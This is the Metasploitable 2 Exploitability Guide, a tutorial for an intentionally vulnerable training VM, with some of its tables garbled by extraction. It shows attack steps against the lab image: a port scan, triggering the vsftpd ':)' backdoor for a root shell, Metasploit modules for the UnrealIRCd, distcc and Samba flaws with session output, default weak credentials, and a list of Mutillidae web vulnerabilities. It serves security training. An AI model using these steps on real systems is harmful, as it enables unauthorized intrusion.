Metasploitable 2 Exploitability Guide - SecurityStreet
Metasploitable 2 Exploitability Guide - SecurityStreet
Version 14
created by HD Moore on May 31, 2012 10:50 PM, last modified by Tod Beardsley on Oct 25, 2013 4:36 PM
Metasploitable 2
The shortlink for this article is: http://r-7.co/Metasploitable2
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security
tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships
with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox,
and other common virtualization platforms. By default, Metasploitable's network interfaces are bound to the NAT and
Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on
installing Metasploitable 2 is available at the link
Tutorial on installing Metasploitable 2.0 on a Virtual Box Host
Only network.)
This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is
documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to
escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with
this platform are detailed.
Getting Started
After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell,
run the ifconfig command to identify the IP address.
msfadmin@metasploitable:~$ ifconfig
eth0
Services
From our attack system (Linux, preferably something like BackTrack), we will identify the open network services on
this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the
Metasploitable 2 instance:
root@ubuntu:~# nmap -p0-65535 192.168.99.131
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT
Nmap scan report for 192.168.99.131
Host is up (0.00028s latency).
Not shown: 65506 closed ports
PORT
STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
port service
100000
tcp
111 portmapper
100000
udp
111 portmapper
100024
100024
100003
udp
2049 nfs
100003
udp
2049 nfs
100003
udp
2049 nfs
100021
100021
100021
100003
tcp
2049 nfs
100003
tcp
2049 nfs
100003
tcp
2049 nfs
100021
100021
100021
100005
100005
100005
100005
100005
100005
Services: Backdoors
On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was
slipped into the source code by an unknown intruder. The backdoor was quickly identified and removed, but not
before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" [ a happy face ], the
backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the
Metasploit Framework module to automatically exploit it:
root@ubuntu:~# telnet 192.168.99.131 21
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user backdoored:)
331 Please specify the password.
pass invalid
^]
telnet> quit
Connection closed.
root@ubuntu:~# telnet 192.168.99.131 6200
Trying 192.168.99.131...
Connected to 192.168.99.131.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went
unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any
listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.99.131:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname;
using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8bMUYsfmGvOLHBxe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
Services:Unintentional Backdoors
In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very
nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler
jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to
run a command of their choice, as demonstrated by the Metasploit module usage below.
msfconsole
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.99.131
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uk3UdiwLUq0LX3Bi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uk3UdiwLUq0LX3Bi\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897)
at 2012-05-31 22:06:03 -0700
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a
backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to
provide access to the root filesystem using an anonymous connection and a writeable share.
root@ubuntu:~# smbclient -L //192.168.99.131
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename
Type
Comment
---------
----
-------
print$
Disk
Printer Drivers
tmp
Disk
oh noes!
opt
Disk
IPC$
IPC
IPC
3.0.20-Debian))
ADMIN$
3.0.20-Debian))
root@ubuntu:~# msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*]
\\192.168.99.131\tmp\rootfs\
Weak Passwords
In additional to the more blatant backdoors and misconfigurations, Metasploit2 has terrible password security for
both system and database server accounts. The primary administrative user msfadmin has a password matching
the username. By discovering the list of users on this system, either by using another flaw to capture the passwd
file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user
accounts. At a minimum, the following weak system accounts are configured on the system.
msfadmin
user
user
postgres
postgres
sys
batman
klog
123456789
service
service
In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and
password postgres, while the MySQL service is open to username root with an empty password. The VNC service
provides remote desktop access using the password password.
Note: 192.168.56/24 is the default "host only" network in Virtual Box. IP address are assigned starting from
"101". Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2
will vary.
To access a particular web application, click on one of the links provided. Individual web applications may
additionally be accessed by appending the application directory name onto http://<IP> to create URL
http://<IP>/<Application Folder>/. For example, the Mutillidae application may be access (in this example) at
address http://192.168.56.101/mutillidae/. The applications are installed in Metasploitable 2 in the /var/www
directory. (Note: See a list with command "ls /var/www".) In the current version as of this writing, the
applications are
mutillidae (NOWASP Mutillidae 2.1.19)
dvwa (Damn Vulnerable Web Application)
phpMyAdmin
tikiwiki (TWiki)
tikiwiki-old
dav (WebDav)
Enable hints in the application by click the "Toggle Hints" button on the menu bar:
The Mutillidae application contains at least the following vulnerabilities on these respective pages:
Page
add-to-your-blog.php
arbitrary-fileinclusion.php
Vulnerabilities
SQL Injection on blog entry
SQL Injection on logged in user name
Cross site scripting on blog entry
Cross site scripting on logged in user name
Log injection on logged in user name
CSRF
JavaScript validation bypass
XSS in the form title via logged in username
The show-hints cookie can be changed by user to enable hints even though they are not
suppose to show in secure mode
System file compromise
Load any page from any site
browser-info.php
capture-data.php
captured-data.php
config.inc*
credits.php
dns-lookup.php
footer.php*
framing.php
Click-jacking
header.php*
html5-storage.php
DOM injection on the add-key error message because the key entered is output into the
error message without being encoded
index.php*
You can XSS the hints-enabled output in the menu because it takes input from the hintsenabled cookie value.
You can SQL injection the UID cookie value because it is used to do a lookup
You can change your rank to admin by altering the UID value
HTTP Response Splitting via the logged in user name because it is used to create an
HTTP Header
This page is responsible for cache-control but fails to do so
This page allows the X-Powered-By HTTP header
HTML comments
There are secret pages that if browsed to will redirect user to the phpinfo.php page. This
can be done via brute forcing
log-visit.php
login.php
Authentication bypass SQL injection via the username field and password field
SQL injection via the username field and password field
XSS via username field
JavaScript validation bypass
passwordgenerator.php
JavaScript injection
pen-test-toollookup.php
JSON injection
phpinfo.php
processcommands.php
process-loginattempt.php
redirectandlog.php
register.php
SQL injection and XSS via the username, signature and password field
rene-magritte.php
Click-jacking
robots.txt
secret-administrative- This page gives hints about how to discover the server configuration
pages.php
set-backgroundcolor.php
Cascading style sheet injection and XSS via the color field
show-log.php
site-footer-xss-
discusson.php
source-viewer.php
text-file-viewer.php
Loading of any arbitrary web page on the Interet or locally including the sites password
files.
Phishing
user-info.php
SQL injection to dump all usernames and passwords via the username field or the
password field
XSS via any of the displayed fields. Inject the XSS on the register.php page.
XSS via the username field
user-poll.php
Parameter pollution
GET for POST
XSS via the choice parameter
Cross site request forgery to force user choice
view-someonesblog.php
XSS via any of the displayed fields. They are input on the add to your blog page.
Share
32
165766 Views
Tw eet
188
Like
274
20 Comments
Please login to comment
lesiah Jun 13, 2012 5:17 PM
Awesome
Like (0)